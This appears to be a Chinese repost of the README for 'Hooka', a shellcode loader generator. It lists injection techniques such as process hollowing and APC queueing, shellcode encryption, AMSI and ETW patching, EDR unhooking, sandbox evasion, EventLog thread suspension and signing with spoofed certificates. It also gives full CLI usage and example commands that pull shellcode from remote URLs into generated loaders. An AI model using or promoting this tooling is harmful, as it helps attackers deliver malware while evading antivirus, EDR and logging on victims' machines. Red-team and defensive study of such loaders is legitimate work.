具有多种功能Shellcode加载生成器

https://github.com/boku7/BokuLoaderhttps://github.com/optiv/Freezehttps://github.com/icyguider/Shhhloader

多种shellcode注入技术：  暂停进程  进程空心化  创建线程  EtwpCreateEtwThread  线程队列ApcThread  无RWX从原始文件、PE、DLL或URL获取shellcode支持EXE和DLL作为输出加载器格式使用以下方法加密 shellcode：  高级加密标准 (AES)  3DES  RC4  异或AMSI和ETW修补（默认启用）随机变量和函数名称Shikata Ga Nai混淆（参见此处）检测沙盒的多种方法启用ACG Guard保护阻止非Microsoft签名的DLL注入到创建的进程中能够通过多种技术解除用户模式挂钩：  经典的  完整 DLL  Perun 的放屁技巧Phant0m技术暂停EventLog线程（参见此处）Windows API哈希（参见此处）使用假证书或真证书对shellcode加载程序进行签名通过凯撒密码进行字符串混淆（参见此处）使用Golang编译和UPX（如果已安装）压缩代码重量计算加载器的二进制熵计算MD5、SHA1和 SHA256校验和以跟踪加载程序

  _   _                   _              _ | | | |   ___     ___   | | __   __ _  | | | |_| |  / _    / _   | |/ /  / _` | | | |  _  | | (_) | | (_) | |   <  | (_| | |_| |_| |_|  ___/   ___/  |_|_  __,_| (_)Usage of Hooka:  REQUIRED:    -i, --input string        payload to inject in raw format, as PE, as DLL or from a URL    -o, --output string       name of output file (i.e. loader.exe)    -f, --format string       format of the payload to generate (available: exe, dll) (default exe)  EXECUTION:    --proc string      process to spawn (in suspended state) when needed for given execution technique (default notepad.exe)    --exec string      technique used to load shellcode (default "SuspendedProcess"):                         SuspendedProcess                         ProcessHollowing                         NtCreateThreadEx                         EtwpCreateEtwThread                         NtQueueApcThreadEx                         No-RWX  AUXILIARY:    -a, --arch string       architecture of the loader to generate (default amd64)    -c, --cert string       certificate to sign generated loader with (i.e. cert.pfx)    -d, --domain string     domain used to sign loader (i.e. www.microsoft.com)  ENCODING:    --enc string         encrypts shellcode using given algorithm (available: aes, 3des, rc4, xor) (default none)    --sgn                use Shikata Ga Nai to encode generated loader (it must be installed on path)    --strings            obfuscate strings using Caesar cipher  EVASION:    --unhook string       unhooking technique to use (available: full, peruns)    --sandbox             enable sandbox evasion    --no-amsi             don't patch AMSI    --no-etw              don't patch ETW    --hashing             use hashes to retrieve function pointers    --acg                 enable ACG Guard to prevent AV/EDR from modifying existing executable code    --blockdlls           prevent non-Microsoft signed DLLs from injecting in child processes    --phantom             suspend EventLog threads using Phant0m technique. High privileges needed, otherwise loader skips this step    --sleep               delay shellcode execution using a custom sleep function  EXTRA:    --calc              use a calc.exe shellcode to test loader capabilities (don't provide input file)    --compress          compress generated loader using Golang compiler and UPX if it's installed    -r, --rand          use a random set of parameters to create a random loader (just for testing purposes)    -v, --verbose       enable verbose to print extra information    -h, --help          print help panelExamples:  hooka -i shellcode.bin -o loader.exe  hooka -i http://192.168.1.126/shellcode.bin -o loader.exe  hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep 60 --acg  hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose

$ hooka_linux_amd64 -i shellcode.bin -o loader.exe

$ hooka_linux_amd64 -i shellcode.bin -o loader.dll -f dll

$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --hashing --agc --sleep --verbose$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdlls$ hooka_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin --sandbox --sleep --domain www.microsoft.com --verbose

添加直接和间接系统调用添加Chacha20算法来加密shellcode更多OPSEC功能总体改善